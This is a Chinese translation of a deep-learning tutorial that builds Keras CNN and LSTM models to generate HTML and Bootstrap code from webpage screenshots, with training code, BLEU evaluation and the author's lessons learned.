CSDN 编者按】一个月前,我们曾发表过一篇标题为《三年后,人工智能将彻底改变前端开发?》的文章,其中介绍了一个彼时名列 GitHub 排行榜 TOP 1 的项目 —— Screenshot-to-code-in-Keras。在这个项目中,神经网络通过深度学习,自动把设计稿变成 HTML 和 CSS 代码,同时其作者 Emil Wallner 表示,“三年后,人工智能将彻底改变前端开发”。
这个 Flag 一立,即引起了国内外非常热烈的讨论,有喜有忧,有褒扬有反对。对此,Emil Wallner 则以非常严谨的实践撰写了系列文章,尤其是在《Turning Design Mockups Into Code With Deep Learning》一文中,详细分享了自己是如何根据 pix2code 等论文构建了一个强大的前端代码生成模型,并细讲了其利用 LSTM 与 CNN 将设计原型编写为 HTML 和 CSS 网站的过程。
以下为全文:
在未来三年内,深度学习将改变前端开发,它可以快速创建原型,并降低软件开发的门槛。
去年,该领域取得了突破性的进展,其中 Tony Beltramelli 发表了 pix2code 的论文[1],而 Airbnb 则推出了sketch2code[2]。
目前,前端开发自动化的最大障碍是计算能力。但是,现在我们可以使用深度学习的算法,以及合成的训练数据,探索人工前端开发的自动化。
本文中,我们将展示如何训练神经网络,根据设计图编写基本的 HTML 和 CSS 代码。以下是该过程的简要概述:
提供设计图给经过训练的神经网络
神经网络把设计图转化成 HTML 代码
大图请点:https://blog.floydhub.com/generate_html_markup-b6ceec69a7c9cfd447d188648049f2a4.gif
渲染画面
我们将通过三次迭代建立这个神经网络。
首先,我们建立一个简化版,掌握基础结构。第二个版本是 HTML,我们将集中讨论每个步骤的自动化,并解释神经网络的各层。在最后一个版本——Boostrap 中,我们将创建一个通用的模型来探索 LSTM 层。
你可以通过 Github[3] 和 FloydHub[4] 的 Jupyter notebook 访问我们的代码。所有的 FloydHub notebook 都放在“floydhub”目录下,而 local 的东西都在“local”目录下。
这些模型是根据 Beltramelli 的 pix2code 论文和 Jason Brownlee 的“图像标注教程”[5]创建的。代码的编写采用了 Python 和 Keras(TensorFlow 的上层框架)。
如果你刚刚接触深度学习,那么我建议你先熟悉下 Python、反向传播算法、以及卷积神经网络。你可以阅读我之前发表的三篇文章:
开始学习深度学习的第一周[6]
通过编程探索深度学习发展史[7]
利用神经网络给黑白照片上色[8]
核心逻辑
我们的目标可以概括为:建立可以生成与设计图相符的 HTML 及 CSS 代码的神经网络。
在训练神经网络的时候,你可以给出几个截图以及相应的 HTML。
神经网络通过逐个预测与之匹配的 HTML 标签进行学习。在预测下一个标签时,神经网络会查看截图以及到这个点为止的所有正确的 HTML 标签。
下面的 Google Sheet 给出了一个简单的训练数据:
https://docs.google.com/spreadsheets/d/1xXwarcQZAHluorveZsACtXRdmNFbwGtN3WMNhcTdEyQ/edit?usp=sharing
当然,还有其他方法[9]可以训练神经网络,但创建逐个单词预测的模型是目前最普遍的做法,所以在本教程中我们也使用这个方法。
请注意每次的预测都必须基于同一张截图,所以如果神经网络需要预测 20 个单词,那么它需要查看同一张截图 20 次。暂时先把神经网络的工作原理放到一边,让我们先了解一下神经网络的输入和输出。
让我们先来看看“之前的 HTML 标签”。假设我们需要训练神经网络预测这样一个句子:“I can code。”当它接收到“I”的时候,它会预测“can”。下一步它接收到“I can”,继续预测“code”。也就是说,每一次神经网络都会接收所有之前的单词,但是仅需预测下一个单词。
神经网络根据数据创建特征,它必须通过创建的特征把输入数据和输出数据连接起来,它需要建立一种表现方式来理解截图中的内容以及预测到的 HTML 语法。这个过程积累的知识可以用来预测下个标签。
利用训练好的模型开展实际应用与训练模型的过程很相似。模型会按照同一张截图逐个生成文本。所不同的是,你无需提供正确的 HTML 标签,模型只接受迄今为止生成过的标签,然后预测下一个标签。预测从“start”标签开始,当预测到“end”标签或超过最大限制时终止。下面的 Google Sheet 给出了另一个例子:
https://docs.google.com/spreadsheets/d/1yneocsAb_w3-ZUdhwJ1odfsxR2kr-4e_c5FabQbNJrs/edit#gid=0
Hello World 版本
让我们试着创建一个“hello world”的版本。我们给神经网络提供一个显示“Hello World”的网页截图,并教它怎样生成 HTML 代码。
大图请点:https://blog.floydhub.com/hello_world_generation-039d78c27eb584fa639b89d564b94772.gif
首先,神经网络将设计图转化成一系列的像素值,每个像素包含三个通道(红蓝绿),数值为 0-255。
我在这里使用 one-hot 编码[10]来描述神经网络理解 HTML 代码的方式。句子“I can code”的编码如下图所示:
上图的例子中加入了“start”和“end”标签。这些标签可以提示神经网络从哪里开始预测,到哪里停止预测。
我们用句子作为输入数据,第一个句子只包含第一个单词,以后每次加入一个新单词。而输出数据始终只有一个单词。
句子的逻辑与单词相同,但它们还需要保证输入数据具有相同的长度。单词的上限是词汇表的大小,而句子的上限则是句子的最大长度。如果句子的长度小于最大长度,就用空单词补齐——空单词就是全零的单词。
如上图所示,单词是从右向左排列的,这样可以强迫每个单词在每轮训练中改变位置。这样模型就能学习单词的顺序,而非记住每个单词的位置。
下图是四次预测,每行代表一次预测。等式左侧是用红绿蓝三个通道的数值表示的图像,以及之前的单词。括号外面是每次的预测,最后一个红方块代表结束。
#Length of longest sentencemax_caption_len = 3#Size of vocabularyvocab_size = 3# Load one screenshot for each word and turn them into digitsimages = []for i in range(2): images.append(img_to_array(load_img('screenshot.jpg', target_size=(224, 224))))images = np.array(images, dtype=float)# Preprocess input for the VGG16 modelimages = preprocess_input(images)#Turn start tokens into one-hot encodinghtml_input = np.array( [[[0., 0., 0.], #start [0., 0., 0.], [1., 0., 0.]], [[0., 0., 0.], #start <HTML>Hello World!</HTML> [1., 0., 0.], [0., 1., 0.]]])#Turn next word into one-hot encodingnext_words = np.array( [[0., 1., 0.], # <HTML>Hello World!</HTML> [0., 0., 1.]]) # end# Load the VGG16 model trained on imagenet and output the classification featureVGG = VGG16(weights='imagenet', include_top=True)# Extract the features from the imagefeatures = VGG.predict(images)#Load the feature to the network, apply a dense layer, and repeat the vectorvgg_feature = Input(shape=(1000,))vgg_feature_dense = Dense(5)(vgg_feature)vgg_feature_repeat = RepeatVector(max_caption_len)(vgg_feature_dense)# Extract information from the input seqencelanguage_input = Input(shape=(vocab_size, vocab_size))language_model = LSTM(5, return_sequences=True)(language_input)# Concatenate the information from the image and the inputdecoder = concatenate([vgg_feature_repeat, language_model])# Extract information from the concatenated outputdecoder = LSTM(5, return_sequences=False)(decoder)# Predict which word comes nextdecoder_output = Dense(vocab_size, activation='softmax')(decoder)# Compile and run the neural networkmodel = Model(inputs=[vgg_feature, language_input], outputs=decoder_output)model.compile(loss='categorical_crossentropy', optimizer='rmsprop')# Train the neural networkmodel.fit([features, html_input], next_words, batch_size=2, shuffle=False, epochs=1000)
在 hello world 版本中,我们用到了 3 个 token,分别是“start”、“<HTML><center><H1>Hello World!</H1></center></HTML>”和“end”。token 可以代表任何东西,可以是一个字符、单词或者句子。选择字符作为 token 的好处是所需的词汇表较小,但是会限制神经网络的学习。选择单词作为 token 具有最好的性能。
接下来进行预测:
# Create an empty sentence and insert the start tokensentence = np.zeros((1, 3, 3)) # [[0,0,0], [0,0,0], [0,0,0]]start_token = [1., 0., 0.] # startsentence[0][2] = start_token # place start in empty sentence# Making the first prediction with the start tokensecond_word = model.predict([np.array([features[1]]), sentence])# Put the second word in the sentence and make the final predictionsentence[0][1] = start_tokensentence[0][2] = np.round(second_word)third_word = model.predict([np.array([features[1]]), sentence])# Place the start token and our two predictions in the sentencesentence[0][0] = start_tokensentence[0][1] = np.round(second_word)sentence[0][2] = np.round(third_word)# Transform our one-hot predictions into the final tokensvocabulary = ["start", "<HTML><center><H1>Hello World!</H1></center></HTML>", "end"]for i in sentence[0]: print(vocabulary[np.argmax(i)], end=' ')
输出结果
10 epochs:start start start
100 epochs:start <HTML><center><H1>Hello World!</H1></center></HTML> <HTML><center><H1>Hello World!</H1></center></HTML>
300 epochs:start <HTML><center><H1>Hello World!</H1></center></HTML> end
在这之中,我犯过的错误
先做出可以运行的第一版,再收集数据。在这个项目的早期,我曾成功地下载了整个 Geocities 托管网站的一份旧的存档,里面包含了 3800 万个网站。由于神经网络强大的潜力,我没有考虑到归纳一个 10 万大小词汇表的巨大工作量。
处理 TB 级的数据需要好的硬件或巨大的耐心。在我的 Mac 遇到几个难题后,我不得不使用强大的远程服务器。为了保证工作流程的顺畅,需要做好心里准备租用一台 8 CPU 和 1G 带宽的矿机。
关键在于搞清楚输入和输出数据。输入 X 是一张截图和之前的 HTML 标签。而输出 Y 是下一个标签。当我明白了输入和输出数据之后,理解其余内容就很简单了。试验不同的架构也变得更加容易。
保持专注,不要被诱惑。因为这个项目涉及了深度学习的许多领域,很多地方让我深陷其中不能自拔。我曾花了一周的时间从头开始编写 RNN,也曾经沉迷于嵌入向量空间,还陷入过极限实现方式的陷阱。
图片转换到代码的网络只不过是伪装的图像标注模型。即使我明白这一点,但还是因为许多图像标注方面的论文不够炫酷而忽略了它们。掌握一些这方面的知识可以帮助我们加速学习问题空间。
在 FloydHub 上运行代码
FloydHub 是深度学习的训练平台。我在刚开始学习深度学习的时候发现了这个平台,从那以后我一直用它训练和管理我的深度学习实验。你可以在 10 分钟之内安装并开始运行模型,它是在云端 GPU 上运行模型的最佳选择。
如果你没用过 FloydHub,请参照官方的“2 分钟安装手册”或我写的“5 分钟入门教程”[11]。
克隆代码仓库:
git clone https://github.com/emilwallner/Screenshot-to-code-in-Keras.git
登录及初始化 FloydHub 的命令行工具:
cd Screenshot-to-code-in-Kerasfloyd login floyd init s2c
在 FloydHub 的云端 GPU 机器上运行 Jupyter notebook:
floyd run --gpu --env tensorflow-1.4 --data emilwallner/datasets/imagetocode/2:data --mode jupyter
所有的 notebook 都保存在“FloydHub”目录下,而 local 的东西都在“local”目录下。运行之后,你可以在如下文件中找到第一个 notebook:
floydhub/Helloworld/helloworld.ipynb
如果你想了解详细的命令参数,请参照我这篇帖子:
https://blog.floydhub.com/colorizing-b&w-photos-with-neural-networks/
HTML 版本
在这个版本中,我们将自动化 Hello World 模型中的部分步骤。本节我们将集中介绍如何让模型处理任意多的输入数据,以及建立神经网络中的关键部分。
这个版本还不能根据任意网站预测 HTML,但是我们将在此尝试解决关键性的技术问题,向最终的成功迈进一大步。
概述
我们可以把之前的解说图扩展为如下:
上图中有两个主要部分。首先是编码部分。编码部分负责建立图像特征和之前的标签特征。特征是指神经网络创建的最小单位的数据,用于连接设计图和 HTML 代码。在编码部分的最后,我们把图像的特征连接到之前的标签的每个单词。
另一个主要部分是解码部分。解码部分负责接收聚合后的设计图和 HTML 代码的特征,并创建下一个标签的特征。这个特征通过一个全连接神经网络来预测下一个标签。
设计图的特征
由于我们需要给每个单词添加一张截图,所以这会成为训练神经网络过程中的瓶颈。所以我们不直接使用图片,而是从中提取生成标签所必需的信息。
提取的信息经过编码后保存在图像特征中。这项工作可以由事先训练好的卷积神经网络(CNN)完成。该模型可以通过 ImageNet 上的数据进行训练。
CNN 的最后一层是分类层,我们可以从前一层提取图像特征。
最终我们可以得到 1536 个 8x8 像素的图片作为特征。尽管我们很难理解这些特征的含义,但是神经网络可以从中提取元素的对象和位置。
HTML 标签的特征
在 hello world 版本中,我们采用了 one-hot 编码表现 HTML 标签。在这个版本中,我们将使用单词嵌入(word embedding)作为输入信息,输出依然用 one-hot 编码。
我们继续采用之前的方式分析句子,但是匹配每个 token 的方式有所变化。之前的 one-hot 编码把每个单词当成一个独立的单元,而这里我们把输入数据中的每个单词转化成一系列数字,它们代表 HTML 标签之间的关系。
上例中的单词嵌入是 8 维的,而实际上根据词汇表的大小,其维度会在 50 到 500 之间。
每个单词的 8 个数字表示权重,与原始的神经网络很相似。它们表示单词之间的关系(Mikolov 等,2013[12])。
以上就是我们建立 HTML 标签特征的过程。神经网络通过此特征在输入和输出数据之间建立联系。暂时先不用担心具体的内容,我们会在下节中深入讨论这个问题。
编码部分
我们需要把单词嵌入的结果输入到 LSTM 中,并返回一系列标签特征,再把这些特征送入 Time distributed dense 层——你可以认为这是拥有多个输入和输出的 dense 层。
同时,图像特征首先需要被展开(flatten),无论数值原来是什么结构,它们都会被转换成一个巨大的数值列表;然后经过 dense 层建立更高级的特征;最后把这些特征与 HTML 标签的特征连接起来。
这可能有点难理解,下面我们逐一分解开来看看。
HTML 标签特征
首先我们把单词嵌入的结果输入到 LSTM 层。如下图所示,所有的句子都被填充到最大长度,即三个 token。
为了混合这些信号并找到更高层的模式,我们加入 TimeDistributed dense 层进一步处理 LSTM 层生成的 HTML 标签特征。TimeDistributed dense 层是拥有多个输入和输出的 dense 层。
图像特征
同时,我们需要处理图像。我们把所有的特征(小图片)转化成一个长数组,其中包含的信息保持不变,只是进行重组。
同样,为了混合信号并提取更高层的信息,我们添加一个 dense 层。由于输入只有一个,所以我们可以使用普通的 dense 层。为了与 HTML 标签特征相连接,我们需要复制图像特征。
上述的例子中我们有三个 HTML 标签特征,因此最终图像特征的数量也同样是三个。
连接图像特征和 HTML 标签特征
所有的句子经过填充后组成了三个特征。因为我们已经准备好了图像特征,所以现在可以把图像特征分别添加到各自的 HTML 标签特征。
添加完成之后,我们得到了 3 个图像-标签特征,这便是我们需要提供给解码部分的输入信息。
解码部分
接下来,我们使用图像-标签的结合特征来预测下一个标签。
在下面的例子中,我们使用三对图形-标签特征,输出下一个标签的特征。
请注意,LSTM 层的 sequence 值为 false,所以我们不需要返回输入序列的长度,只需要预测一个特征,也就是下一个标签的特征,其内包含了最终的预测信息。
最终预测
dense 层的工作原理与传统的前馈神经网络相似,它把下个标签特征的 512 个数字与 4 个最终预测连接起来。用我们的单词表达就是:start、hello、world 和 end。
其中,dense 层的 softmax 激活函数会生成 0-1 的概率分布,所有预测值的总和等于 1。比如说词汇表的预测可能是[0.1,0.1,0.1,0.7],那么输出的预测结果即为:第 4 个单词是下一个标签。然后,你可以把 one-hot 编码[0,0,0,1]转换为映射值,得出“end”。
# Load the images and preprocess them for inception-resnetimages = []all_filenames = listdir('images/')all_filenames.sort()for filename in all_filenames: images.append(img_to_array(load_img('images/'+filename, target_size=(299, 299))))images = np.array(images, dtype=float)images = preprocess_input(images)# Run the images through inception-resnet and extract the features without the classification layerIR2 = InceptionResNetV2(weights='imagenet', include_top=False)features = IR2.predict(images)# We will cap each input sequence to 100 tokensmax_caption_len = 100# Initialize the function that will create our vocabularytokenizer = Tokenizer(filters='', split=" ", lower=False)# Read a document and return a stringdef load_doc(filename): file = open(filename, 'r') text = file.read() file.close() return text# Load all the HTML filesX = []all_filenames = listdir('html/')all_filenames.sort()for filename in all_filenames:X.append(load_doc('html/'+filename))# Create the vocabulary from the html filestokenizer.fit_on_texts(X)# Add +1 to leave space for empty wordsvocab_size = len(tokenizer.word_index) + 1# Translate each word in text file to the matching vocabulary indexsequences = tokenizer.texts_to_sequences(X)# The longest HTML filemax_length = max(len(s) for s in sequences)# Intialize our final input to the modelX, y, image_data = list(), list(), list()for img_no, seq in enumerate(sequences): for i in range(1, len(seq)): # Add the entire sequence to the input and only keep the next word for the output in_seq, out_seq = seq[:i], seq[i] # If the sentence is shorter than max_length, fill it up with empty words in_seq = pad_sequences([in_seq], maxlen=max_length)[0] # Map the output to one-hot encoding out_seq = to_categorical([out_seq], num_classes=vocab_size)[0] # Add and image corresponding to the HTML file image_data.append(features[img_no]) # Cut the input sentence to 100 tokens, and add it to the input data X.append(in_seq[-100:]) y.append(out_seq)X, y, image_data = np.array(X), np.array(y), np.array(image_data)# Create the encoderimage_features = Input(shape=(8, 8, 1536,))image_flat = Flatten()(image_features)image_flat = Dense(128, activation='relu')(image_flat)ir2_out = RepeatVector(max_caption_len)(image_flat)language_input = Input(shape=(max_caption_len,))language_model = Embedding(vocab_size, 200, input_length=max_caption_len)(language_input)language_model = LSTM(256, return_sequences=True)(language_model)language_model = LSTM(256, return_sequences=True)(language_model)language_model = TimeDistributed(Dense(128, activation='relu'))(language_model)# Create the decoderdecoder = concatenate([ir2_out, language_model])decoder = LSTM(512, return_sequences=False)(decoder)decoder_output = Dense(vocab_size, activation='softmax')(decoder)# Compile the modelmodel = Model(inputs=[image_features, language_input], outputs=decoder_output)model.compile(loss='categorical_crossentropy', optimizer='rmsprop')# Train the neural networkmodel.fit([image_data, X], y, batch_size=64, shuffle=False, epochs=2)# map an integer to a worddef word_for_id(integer, tokenizer): for word, index in tokenizer.word_index.items(): if index == integer: return word return None# generate a description for an imagedef generate_desc(model, tokenizer, photo, max_length): # seed the generation process in_text = 'START' # iterate over the whole length of the sequence for i in range(900): # integer encode input sequence sequence = tokenizer.texts_to_sequences([in_text])[0][-100:] # pad input sequence = pad_sequences([sequence], maxlen=max_length) # predict next word yhat = model.predict([photo,sequence], verbose=0) # convert probability to integer yhat = np.argmax(yhat) # map integer to word word = word_for_id(yhat, tokenizer) # stop if we cannot map the word if word is None: break # append as input for generating the next word in_text += ' ' + word # Print the prediction print(' ' + word, end='') # stop if we predict the end of the sequence if word == 'END': break return# Load and image, preprocess it for IR2, extract features and generate the HTMLtest_image = img_to_array(load_img('images/87.jpg', target_size=(299, 299)))test_image = np.array(test_image, dtype=float)test_image = preprocess_input(test_image)test_features = IR2.predict(np.array([test_image]))generate_desc(model, tokenizer, np.array(test_features), 100)
输出结果
生成网站的链接:
250 epochs: https://emilwallner.github.io/html/250_epochs/
350 epochs:https://emilwallner.github.io/html/350_epochs/
450 epochs:https://emilwallner.github.io/html/450_epochs/
550 epochs:https://emilwallner.github.io/html/450_epochs/
如果点击上述链接看不到页面的话,你可以选择“查看源代码”。下面是原网站的链接,仅供参考:
https://emilwallner.github.io/html/Original/
我犯过的错误
与 CNN 相比,LSTM 远比我想像得复杂。为了更好的理解,我展开了所有的 LSTM。关于 RNN 你可以参考这个视频(http://course.fast.ai/lessons/lesson6.html)。另外,在理解原理之前,请先搞清楚输入和输出特征。
从零开始创建词汇表比削减大型词汇表更容易。词汇表可以包括任何东西,如字体、div 大小、十六进制颜色、变量名以及普通单词。
大多数的代码库可以很好地解析文本文档,却不能解析代码。因为文档中所有单词都用空格分开,但是代码不同,所以你得自己想办法解析代码。
用 Imagenet 训练好的模型提取特征也许不是个好主意。因为 Imagenet 很少有网页的图片,所以它的损失率比从零开始训练的 pix2code 模型高 30%。如果使用网页截图训练 inception-resnet 之类的模型,不知结果会怎样。
Bootstrap 版本
在最后一个版本——Bootstrap 版本中,我们使用的数据集来自根据 pix2code 论文生成的 bootstrap 网站。通过使用 Twitter 的 bootstrap(https://getbootstrap.com/),我们可以结合 HTML 和 CSS,并减小词汇表的大小。
我们可以提供一个它从未见过的截图,训练它生成相应的 HTML 代码。我们还可以深入研究它学习这个截图和 HTML 代码的过程。
抛开 bootstrap 的 HTML 代码,我们在这里使用 17 个简化的 token 训练它,然后翻译成 HTML 和 CSS。这个数据集[13]包括 1500 个测试截图和 250 个验证截图。每个截图上平均有 65 个 token,包含 96925 个训练样本。
通过修改 pix2code 论文的模型提供输入数据,我们的模型可以预测网页的组成,且准确率高达 97%(我们采用了 BLEU 4-ngram greedy search,稍后会详细介绍)。
端到端的方法
图像标注模型可以从事先训练好的模型中提取特征,但是经过几次实验后,我发现 pix2code 的端到端的方法可以更好地为我们的模型提取特征,因为事先训练好的模型并没有用网页数据训练过,而且它本来的作用是分类。
在这个模型中,我们用轻量级的卷积神经网络替代了事先训练好的图像特征。我们没有采用 max-pooling 增加信息密度,但我们增加了步长(stride),以确保前端元素的位置和颜色。
有两个核心模型可以支持这个方法:卷积神经网络(CNN)和递归神经网络(RNN)。最常见的递归神经网络就是 LSTM,所以我选择了 RNN。
关于 CNN 的教程有很多,我在别的文章里有介绍。此处我主要讲解 LSTM。
理解 LSTM 中的 timestep
LSTM 中最难理解的内容之一就是 timestep。原始的神经网络可以看作只有两个 timestep。如果输入是“Hello”(第一个 timestep),它会预测“World”(第二个 timestep),但它无法预测更多的 timestep。下面的例子中输入有四个 timestep,每个词一个。
LSTM 适用于包含 timestep 的输入,这种神经网络专门处理有序的信息。模型展开后你会发现,下行的每一步所持有的权重保持不变。另外,前一个输出和新的输入需要分别使用相应的权重。
接下来,输入和输出乘以权重之后相加,再通过激活函数得到该 timestep 的输出。由于权重不随 timestep 变化,所以它们可以从多个输入中获得信息,从而掌握单词的顺序。
下图通过简单图例描述了一个 LSTM 中每个 timestep 的处理过程。
为了更好地理解这个逻辑,我建议你跟随 Andrew Trask 的这篇精彩的教程[14],尝试从头创建一个 RNN。
理解 LSTM 层中的单元
LSTM 层中的单元(unit)数量决定了它的记忆能力,以及每个输出特征的大小。再次强调,特征是一长列的数值,用于在层与层之间的信息传递。
LSTM 层中的每个单元负责跟踪语法中的不同信息。下图描述了一个单元的示例,其内保存了布局行“div”的信息。我们简化了 HTML 代码,并用于训练 bootstrap 模型。
每个 LSTM 单元拥有一个单元状态(cell state)。你可以把单元状态看作单元的记忆。权重和激活函数可以用各种方式改变状态。因此 LSTM 层可以微调每个输入所需要保存和丢弃的信息。
向输入传递输出特征的同时,还需传递单元状态,LSTM 的每个单元都需要传递自己的单元状态值。为了理解 LSTM 各部分的交互方式,我建议你可以阅读:
Colah 的教程:https://colah.github.io/posts/2015-08-Understanding-LSTMs/
Jayasiri 的 Numpy 实现:http://blog.varunajayasiri.com/numpy_lstm.html
Karphay 的讲座和文章:https://www.youtube.com/watch?v=yCC09vCHzF8; https://karpathy.github.io/2015/05/21/rnn-effectiveness/
dir_name = 'resources/eval_light/'# Read a file and return a stringdef load_doc(filename): file = open(filename, 'r') text = file.read() file.close() return textdef load_data(data_dir): text = [] images = [] # Load all the files and order them all_filenames = listdir(data_dir) all_filenames.sort() for filename in (all_filenames): if filename[-3:] == "npz": # Load the images already prepared in arrays image = np.load(data_dir+filename) images.append(image['features']) else: # Load the boostrap tokens and rap them in a start and end tag syntax = '<START> ' + load_doc(data_dir+filename) + ' <END>' # Seperate all the words with a single space syntax = ' '.join(syntax.split()) # Add a space after each comma syntax = syntax.replace(',', ' ,') text.append(syntax) images = np.array(images, dtype=float) return images, texttrain_features, texts = load_data(dir_name)# Initialize the function to create the vocabularytokenizer = Tokenizer(filters='', split=" ", lower=False)# Create the vocabularytokenizer.fit_on_texts([load_doc('bootstrap.vocab')])# Add one spot for the empty word in the vocabularyvocab_size = len(tokenizer.word_index) + 1# Map the input sentences into the vocabulary indexestrain_sequences = tokenizer.texts_to_sequences(texts)# The longest set of boostrap tokensmax_sequence = max(len(s) for s in train_sequences)# Specify how many tokens to have in each input sentencemax_length = 48def preprocess_data(sequences, features): X, y, image_data = list(), list(), list() for img_no, seq in enumerate(sequences): for i in range(1, len(seq)): # Add the sentence until the current count(i) and add the current count to the output in_seq, out_seq = seq[:i], seq[i] # Pad all the input token sentences to max_sequence in_seq = pad_sequences([in_seq], maxlen=max_sequence)[0] # Turn the output into one-hot encoding out_seq = to_categorical([out_seq], num_classes=vocab_size)[0] # Add the corresponding image to the boostrap token file image_data.append(features[img_no]) # Cap the input sentence to 48 tokens and add it X.append(in_seq[-48:]) y.append(out_seq) return np.array(X), np.array(y), np.array(image_data)X, y, image_data = preprocess_data(train_sequences, train_features)#Create the encoderimage_model = Sequential()image_model.add(Conv2D(16, (3, 3), padding='valid', activation='relu', input_shape=(256, 256, 3,)))image_model.add(Conv2D(16, (3,3), activation='relu', padding='same', strides=2))image_model.add(Conv2D(32, (3,3), activation='relu', padding='same'))image_model.add(Conv2D(32, (3,3), activation='relu', padding='same', strides=2))image_model.add(Conv2D(64, (3,3), activation='relu', padding='same'))image_model.add(Conv2D(64, (3,3), activation='relu', padding='same', strides=2))image_model.add(Conv2D(128, (3,3), activation='relu', padding='same'))image_model.add(Flatten())image_model.add(Dense(1024, activation='relu'))image_model.add(Dropout(0.3))image_model.add(Dense(1024, activation='relu'))image_model.add(Dropout(0.3))image_model.add(RepeatVector(max_length))visual_input = Input(shape=(256, 256, 3,))encoded_image = image_model(visual_input)language_input = Input(shape=(max_length,))language_model = Embedding(vocab_size, 50, input_length=max_length, mask_zero=True)(language_input)language_model = LSTM(128, return_sequences=True)(language_model)language_model = LSTM(128, return_sequences=True)(language_model)#Create the decoderdecoder = concatenate([encoded_image, language_model])decoder = LSTM(512, return_sequences=True)(decoder)decoder = LSTM(512, return_sequences=False)(decoder)decoder = Dense(vocab_size, activation='softmax')(decoder)# Compile the modelmodel = Model(inputs=[visual_input, language_input], outputs=decoder)optimizer = RMSprop(lr=0.0001, clipvalue=1.0)model.compile(loss='categorical_crossentropy', optimizer=optimizer)#Save the model for every 2nd epochfilepath="org-weights-epoch-{epoch:04d}--val_loss-{val_loss:.4f}--loss-{loss:.4f}.hdf5"checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_weights_only=True, period=2)callbacks_list = [checkpoint]# Train the modelmodel.fit([image_data, X], y, batch_size=64, shuffle=False, validation_split=0.1, callbacks=callbacks_list, verbose=1, epochs=50)
测试准确度
很难找到合理的方式测量准确度。你可以逐个比较单词,但如果预测结果中有一个单词出现了错位,那准确率可能就是 0%了;如果为了同步预测而删除这个词,那么准确率又会变成 99/100。
我采用了 BLEU 分数,它是测试机器翻译和图像标记模型的最佳选择。它将句子分成四个 n-grams,从 1 个单词的序列逐步扩展为 4 个单词。下例,预测结果中的“cat”实际上应该是“code”。
为了计算最终分数,首先需要让每个 n-grams 的得分乘以 25%并求和,即(4/5) * 0.25 + (2/4) * 0.25 + (1/3) * 0.25 + (0/2) * 0.25 = 02 + 1.25 + 0.083 + 0 = 0.408;得出的总和需要乘以句子长度的惩罚因子。由于本例中预测句子的长度是正确的,因此这就是最终的分数。
增加 n-grams 的数量可以提高难度。4 个 n-grams 的模型最适合人类翻译。为了进一步了解 BLEU,我建议你可以用下面的代码运行几个例子,并阅读这篇 wiki 页面[15]。
#Create a function to read a file and return its contentdef load_doc(filename): file = open(filename, 'r') text = file.read() file.close() return textdef load_data(data_dir): text = [] images = [] files_in_folder = os.listdir(data_dir) files_in_folder.sort() for filename in tqdm(files_in_folder): #Add an image if filename[-3:] == "npz": image = np.load(data_dir+filename) images.append(image['features']) else: # Add text and wrap it in a start and end tag syntax = '<START> ' + load_doc(data_dir+filename) + ' <END>' #Seperate each word with a space syntax = ' '.join(syntax.split()) #Add a space between each comma syntax = syntax.replace(',', ' ,') text.append(syntax) images = np.array(images, dtype=float) return images, text#Intialize the function to create the vocabularytokenizer = Tokenizer(filters='', split=" ", lower=False)#Create the vocabulary in a specific ordertokenizer.fit_on_texts([load_doc('bootstrap.vocab')])dir_name = '../../../../eval/'train_features, texts = load_data(dir_name)#load model and weightsjson_file = open('../../../../model.json', 'r')loaded_model_json = json_file.read()json_file.close()loaded_model = model_from_json(loaded_model_json)# load weights into new modelloaded_model.load_weights("../../../../weights.hdf5")print("Loaded model from disk")# map an integer to a worddef word_for_id(integer, tokenizer): for word, index in tokenizer.word_index.items(): if index == integer: return word return Noneprint(word_for_id(17, tokenizer))# generate a description for an imagedef generate_desc(model, tokenizer, photo, max_length): photo = np.array([photo]) # seed the generation process in_text = '<START> ' # iterate over the whole length of the sequence print('\nPrediction---->\n\n<START> ', end='') for i in range(150): # integer encode input sequence sequence = tokenizer.texts_to_sequences([in_text])[0] # pad input sequence = pad_sequences([sequence], maxlen=max_length) # predict next word yhat = loaded_model.predict([photo, sequence], verbose=0) # convert probability to integer yhat = argmax(yhat) # map integer to word word = word_for_id(yhat, tokenizer) # stop if we cannot map the word if word is None: break # append as input for generating the next word in_text += word + ' ' # stop if we predict the end of the sequence print(word + ' ', end='') if word == '<END>': break return in_textmax_length = 48# evaluate the skill of the modeldef evaluate_model(model, descriptions, photos, tokenizer, max_length): actual, predicted = list(), list() # step over the whole set for i in range(len(texts)): yhat = generate_desc(model, tokenizer, photos[i], max_length) # store actual and predicted print('\n\nReal---->\n\n' + texts[i]) actual.append([texts[i].split()]) predicted.append(yhat.split()) # calculate BLEU score bleu = corpus_bleu(actual, predicted) return bleu, actual, predictedbleu, actual, predicted = evaluate_model(loaded_model, texts, train_features, tokenizer, max_length)#Compile the tokens into HTML and cssdsl_path = "compiler/assets/web-dsl-mapping.json"compiler = Compiler(dsl_path)compiled_website = compiler.compile(predicted[0], 'index.html')print(compiled_website )print(bleu)
输出
输出示例的链接
网站 1:
生成的网站:https://emilwallner.github.io/bootstrap/pred_1/
原网站:https://emilwallner.github.io/bootstrap/real_1/
网站 2:
生成的网站:https://emilwallner.github.io/bootstrap/pred_2/
原网站:https://emilwallner.github.io/bootstrap/real_2/
网站 3:
生成的网站:https://emilwallner.github.io/bootstrap/pred_3/
原网站:https://emilwallner.github.io/bootstrap/real_3/
网站 4:
生成的网站:https://emilwallner.github.io/bootstrap/pred_4/
原网站:https://emilwallner.github.io/bootstrap/real_4/
网站 5:
生成的网站:https://emilwallner.github.io/bootstrap/pred_5/
原网站:https://emilwallner.github.io/bootstrap/real_5/
我犯过的错误
学会理解模型的弱点,避免盲目测试模型。刚开始的时候,我随便尝试了一些东西,比如 batch normalization、bidirectional network,还试图实现 attention。看了测试数据后发现这些并不能准确地预测颜色和位置,我开始意识到这是 CNN 的弱点。因此我放弃了 maxpooling,改为增加步长。结果测试损失从 0.12 降到了 0.02,BLEU 分数从 85%提高到了 97%。
只使用相关的事先训练好的模型。在数据集很小的时候,我以为事先训练好的图像模型能够提高效率。实验结果表明,端到端的模型虽然更慢,训练也需要更多的内存,但准确率能提高 30%。
在远程服务器上运行模型时要为一些差异做好准备。在我的 Mac 上运行时,文件是按照字母顺序读取的。但在远程服务器上却是随机读取的。结果造成了截图和代码不匹配的问题。虽然依然能够收敛,但在我修复了这个问题后,测试数据的准确率提高了 50%。
务必要理解库函数。词汇表中的空 token 需要包含空格。一开始我没加空格,结果就漏了一个 token。直到看了几次最终输出结果,注意到它从来不会预测某个 token 的时候,我才发现了这个问题。检查后发现那个 token 不在词汇表里。此外,要保证训练和测试时使用的词汇表的顺序相同。
